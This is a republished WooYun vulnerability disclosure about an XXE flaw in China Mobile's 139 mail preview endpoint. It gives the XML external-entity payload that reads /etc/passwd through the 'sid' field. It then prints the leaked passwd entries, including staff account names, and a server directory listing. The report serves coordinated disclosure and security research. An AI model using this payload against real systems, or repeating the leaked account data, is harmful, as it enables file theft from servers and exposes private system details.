139邮箱XXE漏洞可读取文件

admin 2015年6月3日09:54:39评论417 views字数 233阅读0分46秒阅读模式
摘要

2014-08-29: 细节已通知厂商并且等待厂商处理中
2014-09-01: 厂商已经确认,细节仅向厂商公开
2014-09-11: 细节向核心白帽子及相关领域专家公开
2014-09-21: 细节向普通白帽子公开
2014-10-01: 细节向实习白帽子公开
2014-10-11: 细节向公众公开

漏洞概要 关注数(17) 关注此漏洞

缺陷编号: WooYun-2014-74048

漏洞标题: 139邮箱XXE漏洞可读取文件

相关厂商: 10086.cn

漏洞作者: 路人甲

提交时间: 2014-08-29 14:41

公开时间: 2014-10-11 14:42

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 10

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 设计不当 设计缺陷

6人收藏


漏洞详情

披露状态:

2014-08-29: 细节已通知厂商并且等待厂商处理中
2014-09-01: 厂商已经确认,细节仅向厂商公开
2014-09-11: 细节向核心白帽子及相关领域专家公开
2014-09-21: 细节向普通白帽子公开
2014-10-01: 细节向实习白帽子公开
2014-10-11: 细节向公众公开

简要描述:

139邮箱XXE漏洞可读取文件

详细说明:

/opes/preview.do 输入处理不当可以通过sid取回文件内容

<?xml version="1.0" encoding="UTF-8" standalone="no"?>

<!DOCTYPE ANY [

<!ENTITY all SYSTEM "file:///etc/passwd">

]>

...

<string name="sid">&all;</string>

...

漏洞证明:

/etc/passwd:

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

avahi:x:70:70:Avahi daemon:/:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

apache:x:48:48:Apache:/var/www:/sbin/nologin

oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin

xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin

gdm:x:42:42::/var/gdm:/sbin/nologin

sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin

mailattr:x:550:550::/home/mailattr:/bin/bash

oracle:x:551:551::/home/oracle:/bin/bash

opes:x:500:500::/home/opes:/bin/bash

richlogall:x:55561:55561::/home/richlogall:/sbin/nologin

laibin:x:55562:55562::/home/laibin:/bin/bash

zhougx:x:55563:55563::/home/zhougx:/bin/bash

liuyq:x:55564:55564::/home/liuyq:/bin/bash

huangmp:x:55565:55565::/home/huangmp:/bin/bash

wenjj:x:55566:55566::/home/wenjj:/bin/bash

tanlinzhi:x:55567:55567::/home/tanlinzhi:/bin/bash

/home/opes:

.bash_history

.bash_logout

.bash_profile

.bashrc

.emacs

.lesshst

.mozilla

.ssh

.viminfo

.Yozo_Office

.zshrc

logs

maila

nfsmailattachment

nfsmailattachment01

nfsmailattachment02

nfsmailattachment03

opesconfig

printerName.sh

RealTimeSave

Temp

tmp

tomcat

Yozo_FileConvertLog.txt

Yozo_Office

Yozo_Officelog.txt

修复方案:

要修复找永中

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-09-01 09:37

厂商回复:

CNVD确认所述情况,已经转由CNCERT通报给中国移动集团公司处置,对于XXE漏洞,虽然不新鲜,但实例还是比较难发现,rank 14

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-08-27 14:55 | pandas ( 普通白帽子 | Rank:730 漏洞数:84 | 国家特级保护动物)

    0

    关注,虽然不用移动

  2. 2014-08-27 15:40 | Destinys ( 路人 | Rank:15 漏洞数:6 | 新手村)

    0

    屌飞了

  3. 2014-08-27 16:52 | 香草 ( 普通白帽子 | Rank:103 漏洞数:15 | javascript,xss,jsp、aspx)

    0

    读取任意文件吗

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin